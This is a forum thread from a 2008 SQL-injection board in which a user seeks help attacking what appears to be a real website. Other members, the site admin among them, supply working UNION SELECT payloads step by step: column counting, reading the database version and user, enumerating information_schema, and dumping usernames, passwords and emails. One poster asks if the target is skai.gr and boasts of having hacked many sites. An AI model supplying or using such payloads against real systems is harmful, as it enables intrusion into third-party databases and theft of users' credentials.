 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
MySQL injection problem |
 |
 Posted: Sat Feb 09, 2008 12:32 pm |
 |
|
| Panic_Mode |
| Active user |
 |
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
 |
|
 |
|
First of all I'm glad to join your community guys.
Now, I have an injection problem. I have found the number of columns (5 btw) and the table name (let's call it table_name), and now i am trying to get the union all select command to work.
I am trying "union all select 0,0,0,0,0 from table_name" but i get a "The used SELECT statements have a different number of columns" error..
Any clues?  |
|
|
|
|
|
Re: MySQL injection problem |
|
| Posted: Sat Feb 09, 2008 1:04 pm |
|
|
| gtal3x |
| Active user |
 |
| |
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
Well for me it seems that u dident find the right number of columns, btw use:
union+select+1,2,3,4,5/* |
|
|
|
|
| Posted: Sat Feb 09, 2008 1:21 pm |
|
|
| waraxe |
| Site admin |
 |
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
There can be more complicated situations, where sql injection occurs in multiple sql queries with different number of columns 
In this case blind sql injection methods can be useful - instead of UNION you can use SubSelects functionality and BENCHMARK, if needed.
By the way - you can see error messages, right? Is there info about error location - script name and line number? |
|
|
|
|
| Posted: Sat Feb 09, 2008 1:23 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
Yeh the message was pretty obvious 
So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table? 
Anyway, now when i try the union select I get "Unknown column 'e.OK' in 'order clause'" error 
Tnx for help |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 1:36 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | Yeh the message was pretty obvious
So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table?
Anyway, now when i try the union select I get "Unknown column 'e.OK' in 'order clause'" error
Tnx for help |
Yes, this is not rare to see such big numbers. I have seen > 60 columns - it was SELECT * with multiple JOIN's ...
Next, comment out end of the clause, as gtal3x allready suggested before.
Something like:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+table_name/*
|
If you see error messages, post them here |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 1:39 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
| waraxe wrote: | | By the way - you can see error messages, right? Is there info about error location - script name and line number? |
Not detailed errors. I get errors like the ones I posted "Unknown column 'e.OK' in 'order clause'", The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 1:43 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | | waraxe wrote: | | By the way - you can see error messages, right? Is there info about error location - script name and line number? |
Not detailed errors. I get errors like the ones I posted "Unknown column 'e.OK' in 'order clause'", The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p |
It's because there is checking code for mysql result handle and if it's FALSE, then mysql_error() will be executed.
If programmers are lazy (in most cases  ), then no checking and next mysql call wih invalid handle will emit php warning level error message, like "Warning: ... mysql_fetch_row ... error ... line 112 ..." |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 1:54 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
I commented out the end and it seemed to work (thanks gtal3x and waraxe ).
Now I get each columns number in the page, in the place where data from that column should be presented... but no other output.
Any help to move on? |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 2:18 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Panic_Mode wrote: | I commented out the end and it seemed to work (thanks gtal3x and waraxe ).
Now I get each columns number in the page, in the place where data from that column should be presented... but no other output.
Any help to move on? |
Now you must find column or columns capable of outputting long enough data. Let's assume, that you see feedback from column 15:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,@@version,16,17,18,19,20,21,22/*
|
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,USER(),16,17,18,19,20,21,22/*
|
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,DATABASE(),16,17,18,19,20,21,22/*
|
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,name,16,17,18,19,20,21,22+FROM+mysql.user/*
|
And if you want info from table_name, then you must know column names!
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,put_known_column_name_here,16,17,18,19,20,21,22+FROM+table_name/*
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 2:54 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
Thanks for your help mate.
The normal functions can be executed and give an outpud to these fields. But now i tried outputing info from a column of the table_name. The first guess was (of course) "password". It seemed to outputted some random password number (the first in the row maybe?).
Now my guess (and plz correct me if i am wrong) is that I need a "where" attribute to outputt a specific password or whatever I want...
e.g
| Code: | | UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22+FROM+table_name/*+WHERE+name+=doe |
but the main problem is that i don't seem to guess the other columns correct to determine a specific user... |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 3:12 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So you have sql injection, where only single row can be fetched?
Then you must use LIMIT x,y.
Next, find out all imortant column names - username, fname, lname, email,login,password,salt,hash,phone, etc etc ...
You can use INFORMATION_SCHEMA, if mysql is 5.x version.
And finally:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,CONCAT(username,0x5e,password,0x5e,email),16,17,18,19,20,21,22+FROM+table_name+LIMIT+0,1/*
|
This will give you first row. Next row can fetched via manipulating LIMIT clause. |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 4:44 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
Everything works like a charm. But I want to work with the INFROMATION_SCHEMA thing a bit. :p
I use
| Code: | | UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+AND+TABLE_NAME=[here the table name]+WHERE+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/* |
and i get the error
| Code: | | You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND TABLE_NAME=XXXX WHERE TABLE_SCHEMA=XXXXX LIMIT 1,2/* ORDER BY e.OK DES' at line 1 |
mysql 5.0.22 version |
|
|
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 5:14 pm |
|
|
| gtal3x |
| Active user |
|
| |
| Joined: Dec 03, 2007 |
| Posts: 33 |
| Location: Ukraine |
|
|
|
|
|
|
just do this:
| Code: | | +union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,column_name,7,8,9,0,1,2+from+information_schema.columns+where+column_name+like+0x257573657225+limit+1,1/* |
btw r u tryin to hack skai.gr ? I have got many sites already hacked, so if u wonna get train, send me pm i will give u links |
|
|
|
|
| Posted: Sat Feb 09, 2008 5:21 pm |
|
|
| waraxe |
| Site admin |
|
| |
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You have syntax errors in clause ...
Try this:
| Code: |
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=[here the table name]+AND+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/*
|
|
|
|
|
|
| Posted: Sat Feb 09, 2008 5:39 pm |
|
|
| Panic_Mode |
| Active user |
|
| |
| Joined: Feb 09, 2008 |
| Posts: 39 |
|
|
|
|
|
|
|
First of all tnx guys for your help and quick replies once more
@gtal3x
Tried your code but I only get the output "User". With LIMIT I try to fetch some other names but no luck. Only user comes out. Also User column doesn't exist in the table...
(also what "0x257573657225" stands for?)
@waraxe
i get the error
| Code: | | Unknown column '[here the table name]' in 'where clause' |
column? |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 3
Goto page 1, 2, 3 Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9145
People Online:
Visitors: 914
Members: 0
Total: 914
